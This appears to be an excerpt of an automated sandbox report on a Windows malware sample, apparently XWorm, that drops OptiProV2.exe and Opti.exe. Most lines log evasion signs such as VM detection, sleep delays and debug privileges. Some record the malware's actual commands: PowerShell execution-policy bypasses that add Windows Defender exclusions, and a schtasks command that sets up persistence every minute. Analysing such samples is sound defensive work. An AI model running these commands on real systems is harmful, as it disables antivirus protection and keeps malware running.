                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Program Files\Common Files\OptiProV2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeMemory allocated: 20DA6CB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeMemory allocated: 20DC0580000 memory reserve | memory write watchJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeMemory allocated: 10F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeMemory allocated: 1AAF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Opti.exeMemory allocated: 2770000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Opti.exeMemory allocated: 1A930000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Opti.exeMemory allocated: 1390000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Opti.exeMemory allocated: 1B0A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Opti.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Opti.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files\Common Files\OptiProV2.exeWindow / User API: threadDelayed 6163Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeWindow / User API: threadDelayed 3658Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5658Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4161Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7587Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2039Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7961Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1540Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8021
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1595
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exe TID: 2024Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exe TID: 4708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exe TID: 2940Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 7587 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep count: 2039 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 7961 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 1540 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep count: 8021 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 1595 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5984Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Users\user\AppData\Local\Opti.exe TID: 1988Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Opti.exe TID: 2508Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Program Files\Common Files\OptiProV2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Opti.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Opti.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Opti.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Opti.exeThread delayed: delay time: 922337203685477
                  Source: OptiProV2.exe, 0000000B.00000002.2526931319.000000001BB92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"
                  Source: r4RF3TX5Mi.exe, 00000001.00000002.1360047222.0000020DA6C2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Opti.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe'
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Opti.exe'
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Opti.exe'Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe'
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess created: C:\Program Files\Common Files\OptiProV2.exe "C:\Program Files\Common Files\OptiProV2.exe" Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OptiProV2.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Opti.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Opti.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe"Jump to behavior
                  Source: OptiProV2.exe, 0000000B.00000002.2520367269.0000000002B5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                  Source: OptiProV2.exe, 0000000B.00000002.2520367269.0000000002B5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: OptiProV2.exe, 0000000B.00000002.2520367269.0000000002B5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                  Source: OptiProV2.exe, 0000000B.00000002.2520367269.0000000002B5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                  Source: OptiProV2.exe, 0000000B.00000002.2520367269.0000000002B5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeQueries volume information: C:\Users\user\Desktop\r4RF3TX5Mi.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeQueries volume information: C:\Program Files\Common Files\OptiProV2.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
